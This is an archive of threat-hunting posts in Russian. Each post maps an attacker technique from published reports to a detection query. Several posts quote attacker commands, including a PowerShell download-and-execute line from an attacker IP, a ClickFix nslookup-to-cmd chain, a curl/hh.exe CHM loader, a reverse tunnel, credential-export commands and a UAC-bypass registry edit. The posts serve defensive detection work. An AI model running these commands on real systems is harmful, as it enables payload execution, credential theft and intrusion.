en
Feedback
1 556
Subscribers
+124 hours
-17 days
+430 days
Posts Archive
Всем привет! Сегодня мы взглянем на креативную реализацию крайне популярной техники - Spearphishing Link (T1566.002). Согласн
Всем привет! Сегодня мы взглянем на креативную реализацию крайне популярной техники - Spearphishing Link (T1566.002). Согласно этому исследованию, в феврале 2026 года кластер TA416 распространял фишинговые письма со ссылками, которые вели на Google Drive или скомпрометированные инстансы SharePoint. По ссылкам размещались архивы, которые содержали переименованный исполняемый файл MSBuild (например, в Invitation_Letter_No.02_2026) и файл проекта CSPROJ, который и выполнялся после запуска - MSBuild по умолчанию ищет соответствующий файл в текущей директории. Успешный запуск приводил к загрузке трех файлов, которые впоследствии использовались для реализации техники DLL-Sideloading. Несмотря на креативный подход злоумышленников, обнаружить подобное злоупотребление MSBuild довольно просто, например:
event_type: "processcreatewin"

AND

proc_file_originalfilename: "msbuild.exe"

AND NOT

proc_file_path: "msbuild.exe"
Скоро увидимся! English version

Всем привет! Если вы не смогли посетить конференцию, но хотели послушать мой доклад, появилась запись!

Всем привет! Сегодня мы с вами поговорим о сборе данных со скомпрометированных систем, и посмотрим на пример техники Archive
Всем привет! Сегодня мы с вами поговорим о сборе данных со скомпрометированных систем, и посмотрим на пример техники Archive Collected Data: Archive via Utility (T1560.001). Источником же примера послужит отчет Microsoft Threat Intelligence об активности кластера Storm-1175, связанного с распространением программы-вымогателя Medusa. Несмотря на то, что злоумышленник использовали в том числе 0-day уязвимости для получения первоначального доступа, основная масса их тактик, техник и процедур была довольно тривиальна. Тем не менее, один из инструментов привлек мое внимание. Для сбора данных с целью последующей публикации на DLS, атакующие использовали Bandizip - легитимный инструмент для архивации файлов. Данный инструмент встречается не так часто, и вполне подходит для проактивного поиска, например:
event_type: "processcreatewin"

AND

proc_file_productname: "bandizip"
Скоро увидимся! English version

Всем привет! Уверен, вы уже устали читать про Threat Hunting. Самое время начать им заниматься! Именно об этом мы с вами и по
Всем привет! Уверен, вы уже устали читать про Threat Hunting. Самое время начать им заниматься! Именно об этом мы с вами и поговорим уже совсем скоро на конференции R-Evolution, регистрируйтесь и приходите! Скоро увидимся!

Всем привет! Сегодня мы в очередной раз поговорим о технике Bypass User Account Control (T1548.002), и рассмотрим интересный
Всем привет! Сегодня мы в очередной раз поговорим о технике Bypass User Account Control (T1548.002), и рассмотрим интересный вариант ее реализации. И поможет нам в этом отчет об операции "TrueChaos". На одном из этапов жизненного цикла кибератаки злоумышленники изменили переменную PATH текущего пользователя:
reg add "hkcu\environment" /v path /t REG_SZ /d "C:\users\<redacted>\appdata\local\temp" /f
После этого атакующие запустили легитимный инструментом Microsoft iSCSI Initiator Control Panel (iscsicpl.exe), который использовался для обхода контроля учетных записей и DLL Hijacking. А вредоносная iscsiexe.dll помещалась злоумышленниками как раз в том самом расположении, которое было записано в реестр на предыдущем шаге. В данном случае мы, например, можем поохотиться за добавлением подозрительных значений в соотвествующий раздел реестра:
event_type: "registryvaluesetwin"

AND

reg_key_path: "environment\\path"

AND

reg_value_data: "appdata\\local\\temp"
Вы также можете поискать события загрузки DLL в iscsicpl.exe из подозрительных расположений, например:
event_type: "imageloadwin"

AND

proc_file_path: "iscsicpl.exe"

AND

file_path: "temp"
Скоро увидимся! English version

Всем привет! Очередной день - очередной Dead Drop Resolver (T1102.001). И в этот раз эксплуатируемые веб-сервисы еще интересн
Всем привет! Очередной день - очередной Dead Drop Resolver (T1102.001). И в этот раз эксплуатируемые веб-сервисы еще интереснее, чем обычно. Согласно исследованию Solar о MaskGram Stealer, помимо уже полюбившимся атакующим Steam и Telegram, злоумышленники также использовали Spotify и Chess.com. Как и прежде, стоит обращать внимание на коммуникации с легитимными веб-сервисами, которыми пользуются атакующие в рамках данной техники, и выделять нетипичные процессы:
event_type: "dnsreqwin"

AND

dns_rname: ("spotify.com" OR "chess.com")

AND NOT

proc_file_path: (your_exclusion_list)
Скоро увидимся! English version

Всем привет! Сегодня мы разберем несколько техник из отчета об атаках Warlock, которые привлекли мое внимание. Итак, первая т
Всем привет! Сегодня мы разберем несколько техник из отчета об атаках Warlock, которые привлекли мое внимание. Итак, первая техника - Windows Credential Manager (T1555.004). Злоумышленники использовали следующую команду, чтобы получить доступ к сохраненным паролям:
C:\Windows\System32\rundll32.exe keymgr.dll,KRShowKeyMgr
Подобный поведенческий маркер встречается не так часто, поэтому вполне подойдет для поиска:
event_type: "processcreatewin"

AND

proc_file_path: "rundll32.exe"

AND

cmdline: ("keymgr.dll" AND "KRShowKeyMgr")
Следующая техника - PowerShell (T1059.001). В этот раз атакующие злоупотребляли им для включения PowerShell Remoting:
C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe "Enable-PSRemoting -Force -SkipNetworkProfileCheck"
Такое поведение хоть и может быть легитимным, является достойной целью для проактивного поиска:
event_type: "processcreatewin"

AND

proc_file_path: "powershell.exe"

AND

cmdline: "Enable-PSRemoting"
Также стоит отметить использование очередного инструмента с открытым исходным кодом для туннелирования (Protocol Tunneling (T1572)) - Yuze:
rundll32 yuze.dll,RunYuze reverse -c 198[.]13[.]158[.]193:80
В данном случае мы также можем поохотиться за соотвествующими параметрами командной строки:
event_type: "processcreatewin"

AND

cmdline: ("reverse" AND "c")
А какие из описанных техник вам показались интересными? Скоро увидимся! English version

Эволюция ClickFix – массовая угроза в мире социальной инженерии Если первые зловреды ClickFix были нацелены на Windows, то те
Эволюция ClickFix – массовая угроза в мире социальной инженерии Если первые зловреды ClickFix были нацелены на Windows, то теперь исследователи фиксируют варианты специально для macOS. Жертва запускает Terminal, вставляет скопированную с веб-страницы команду и получает «подарок» – вредоносное ПО для кражи данных. Например, Atomic macOS Stealer, способный похищать учётные данные браузера, cookies и данные криптовалютных кошельков. ➡️Что ещё важно знать о ClickFix и как защититься? Об этом в интервью «Киберболоиду» рассказал руководитель BI.ZONE Threat Intelligence Олег Скулкин. #киберболоид #мастерская

Всем привет! Сегодня мы рассмотрим ещё один интересный пример использования следующей техники: Remote Access Tools (T1219). П
Всем привет! Сегодня мы рассмотрим ещё один интересный пример использования следующей техники: Remote Access Tools (T1219). Просматривая отчёт о модус операнди Handala Hack, я заметил интересный инструмент, которым злоупотребляли злоумышленники. Речь идёт о NetBird. Атакующие использовали его, чтобы получать доступ к хостам, которые не были напрямую доступны извне сети. У этого инструмента нет обнаружений на VirusTotal, и он может быть хорошей целью для проактивного поиска, например:
event_type: "processcreatewin"

AND

proc_file_productname: "netbird"
Скоро увидимся! English version

Всем привет! Сегодня мы в очередной раз поговорим о реестре Windows, и посмотрим на пример реализации техники Unsecured Crede
Всем привет! Сегодня мы в очередной раз поговорим о реестре Windows, и посмотрим на пример реализации техники Unsecured Credentials: Credentials in Registry (T1552.002). Листая отчет о расследовании кибератак CL-UNK-1068 в Южной, Юго-Восточной и Восточной Азии, я в очередной раз увидел, что злоумышленники активно злоупотребляли reg.exe. При этом, они активно использовали параметр export, например:
reg export "HKEY_USERS\[%SID%]\SOFTWARE\TightVNC\Server"

reg export HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\TightVNC\Server

reg export HKEY_LOCAL_MACHINE\SOFTWARE\TightVNC\Server
В данном случае злоумышленник экспортирует конфигурацию TightVNC из реестра, чтобы получить учетные данные. Для обнаружения мы можем использовать как конкретные разделы реестра, содержащие чувствительные данные, так и проактивно поискать подозрительные события экспорта:
event_type: "processcreatewin"

AND

proc_file_path: "reg.exe"

AND

cmdline: "export"
Скоро увидимся! English version

Всем привет! Иногда, даже если жертва запустила вредоносный файл, компрометация системы может не наступить. И виной этому при
Всем привет! Иногда, даже если жертва запустила вредоносный файл, компрометация системы может не наступить. И виной этому применение техники System Location Discovery: System Language Discovery (T1614.001). Дело в том, что в некоторых случаях злоумышленники не хотят, чтобы их ВПО запускалось в системах, расположенных в определенных странах. Сегодня мы посмотрим на пример того, как атакующие ограничивают загрузку стилера для систем, потенциально расположенных в СНГ. Итак, загрузчик стилера SHub, ориентированного на macOS, использовал следующую команду, чтобы получить информацию о языке скомпрометированной системы:
defaults read ~/Library/Preferences/com.apple.HIToolbox.plist AppleEnabledInputSources 2>/dev/null | grep -qi russian
Ключ AppleEnabledInputSources в файле com.apple.HIToolbox.plist содержит информацию о раскладках клавиатуры, содержимое которого и преряется на наличие русского языка, характерного для СНГ. Хорошей возможностью обнаружения являются подозрительные события чтения данного ключа, например:
event_type: "processcreatemac"

AND

proc_file_path: "defaults"

AND

cmdline: ("read" AND "appleenabledinputsources")
Скоро увидимся! English version

Всем привет! Сегодня мы с вами взглянем на не самую популярную технику. Тем не менее, время от времени она появляется в арсен
Всем привет! Сегодня мы с вами взглянем на не самую популярную технику. Тем не менее, время от времени она появляется в арсенале атакующих. И это System Binary Proxy Execution: Compiled HTML File (T1218.001). Зачастую данная техника используется на начальных этапах жизненного цикла кибератаки. Например, злоумышленники могут распространять вредоносные файлы CHM в архивах в качестве вложений в фишинговые письма. Давайте взглянем на пример. В данном случае атакующие использовали архив с ярлыком, который содержал следующую команду:
"C:\Windows\System32\rundll32.exe" shell32.dll ShellExec_RunDLL conhost --headless cmd /c curl www.360printsol[.]com/2026/alfadhalah/thumbnail?img=index.png -L""skontv&hh -d""ecompile^ . nt""v&0.ln""k
В данном случае файл CHM загружается с удаленного веб-ресурса и распаковывается с помощью Windows HTML Help (hh.exe), при этом, используется аргумент -decompile. В контексте проактивного поиска угроз мы можем искать как события подозрительного запуска hh.exe как с использованием, так и без использования аргумента -decompile, например:
event_type: "processcreatewin"

AND

proc_file_path: "hh.exe"

AND

cmdline: "decompile"
Скоро увидимся! English version

Всем привет! Сегодня мы поговорим о еще одном легитимном сервисе, которым злоупотребляют атакующие, в данном случае APT37. И,
Всем привет! Сегодня мы поговорим о еще одном легитимном сервисе, которым злоупотребляют атакующие, в данном случае APT37. И, разумеется, разберемся, как пользоваться этой информацией для проактивного поиска. Итак, в одной из достаточно свежих кампаний APT37 (мы отслеживаем данный кластер как Squid Werewolf) использовали имплант RESTLEAF, который злоупотреблял Zoho WorkDrive - облачной платформой управления файлами и совместной работы. С точки зрения проактивного поиска, мы можем идентифицировать все сетевые коммуникации, относящиеся к Zoho WorkDrive, после чего отделить события, являющиеся легитимными:
event_type: "dnsreqwin"

AND

dns_rname: "workdrive.zohoexternal.com"
Скоро увидимся! English version

Всем привет! Кажется, тренд действительно подтверждается: еще один легитимный инструмент для мониторинга сотрудников попал в
Всем привет! Кажется, тренд действительно подтверждается: еще один легитимный инструмент для мониторинга сотрудников попал в арсенал злоумышленников. Malwarebytes рассказали о кампании, в рамках которой атакующие маскируют инсталляторы Teramind под обновления Zoom и Google Meet. Teramind - это программная платформа для мониторинга сотрудников и анализа их активности на рабочем месте. Она помогает компаниям отслеживать и анализировать действия пользователей на компьютерах и в сети для повышения безопасности, продуктивности и соблюдения корпоративных правил. Тем не менее, злоумышленники могут использовать подобное программное обеспечение для несанкционированного доступа к корпоративным системам. Во-первых, мы можем поискать события, связанные с запускам файлов, подписанных Teramind Inc., например:
event_type: "processcreatewin"

AND

proc_file_sig: "teramind"
Также можно взглянуть на подозрительные коммуникации с teramind[.]co:
event_type: "dnsreqwin"

AND

dns_rname: "teramind.co"
Скоро увидимся! English version

Всем привет! Я продолжаю работать над серией материалов, посвященных практическому применению киберразведданных и внедрению угрозоцентричного подхода. В этот раз поговорим о том, как предотвращать кибератаки, используя информацию об инфраструктуре атакующих. Скоро увидимся!

Всем привет! Последние несколько лет меня очень интересовал Purple Teaming. Собственно, пришло время поделиться накопленным о
Всем привет! Последние несколько лет меня очень интересовал Purple Teaming. Собственно, пришло время поделиться накопленным опытом! Вместе с Владом и нашими друзьями из Inseca мы разработали шестинедельный курс по данному направлению. О чем поговорим в рамках курса: - Что такое Purple Teaming и почему вам стоит им заниматься? - Как подготовиться к киберучениям в подобном формате и как сделать их процессом? - Что такое эмуляция атакующих, где брать данные для нее, и как с ними работать? - Как разрабатывать детектирующую логику и когда этим следует заниматься? - Что такое Threat Hunting, когда и кому он нужен? - Как проводить киберучения и как автоматизировать этот процесс? Курс начнется 13 марта, если вам он интересен, у вас еще есть время записаться! Для читателей, разумеется, бонус - скидка 10% по промокоду knowyouradversary! Скоро увидимся!

Всем привет! Думаю, все привыкли, что атакующие активно злоупотребляют средствами удаленного управления, но, кажется, вырисов
Всем привет! Думаю, все привыкли, что атакующие активно злоупотребляют средствами удаленного управления, но, кажется, вырисовывается новый тренд - злоупотребление инструментами для мониторинга сотрудников. Мы уже видели, как атакующие использовали Controlio и Mipko Employee Monitor, а в свежем отчете Huntress указывается, что вымогатели добавили в свой арсенал еще один похожий инструмент - Network LookOut Net Monitor for Employees. Что поискать? Например, подозрительное взаимодействие с networklookout[.]com:
event_type: "dnsreqwin"

AND

dns_rname: "networklookout.com"
Ну и, разумеется, события запуска процессов, метаданные которых указывают на данный инструмент, например:
event_type: "processcreatewin"

AND

proc_file_productname: "Net Monitor for Employees Pro"
Скоро увидимся! English version

Всем привет! Варианты техники Malicious Copy and Paste (T1204.004) не прекращают пользоваться популярностью у злоумышленников
Всем привет! Варианты техники Malicious Copy and Paste (T1204.004) не прекращают пользоваться популярностью у злоумышленников. Сегодня мы посмотрим на очередной из них, и разберемся, действительно ли он влияет на наши возможности обнаружения. Данным вариантом поделились исследователи Microsoft Threat Intelligence. Команда, которую предлагают выполнить жертве, выполняет DNS-запрос к подконтрольному злоумышленникам серверу, и парсит поле 'Name:' ответа:
cmd /c "nslookup example.com 84.21.189[.]20 | findstr "^Name:" | for /f "tokens=1,* delims=:" %a in ('more') do @echo %b" | cmd && exit\1
Несмотря на оригинальность подхода, в поле 'Name:' хранится довольно банальная команда:
powershell.exe -ep bypass -w h -c "iwr hxxp://64.227.40[.]197/o -useb | iex"
Как видите, здесь нет ничего оригинального, а поискать подобную активность можно, например, так:
event_type: "processcreatewin"

AND

proc_file_path: "powershell.exe"

AND

cmdline: ("iwr" AND "iex")
Скоро увидимся! English version

Всем привет! Сегодня мы посмотрим на технику Service Stop (T1489), и разберемся, стоит ли охотиться за ее реализацией. Данная
Всем привет! Сегодня мы посмотрим на технику Service Stop (T1489), и разберемся, стоит ли охотиться за ее реализацией. Данная техника - типичный поведенческий маркер для программ-вымогателей и вайперов. Если вы загляните в ATT&CK, то увидите массу примеров. Обычно, такие программы используются в самом конце жизненного цикла кибератаки, и едва ли являются целями для проактивного поиска. Но, разумеется, бывают и исключения. Давайте взглянем на ботнет Prometei. В процессе инсталляции ВПО останавливает службу WinRM, а после отключает ее:
sc stop WinRM

sc config WinRM start= disabled
Зачем это нужно? Это,например, затруднит удаленное администрирование. Может ли такая активность быть легитимной? Конечно! Следовательно, это такой поведенческий маркер - неплохая цель для проактивного поиска:
event_type: "processcreatewin"

AND

proc_file_path: "sc.exe"

AND

cmdline: ("winrm" AND "disabled")
Скоро увидимся! English version

photo content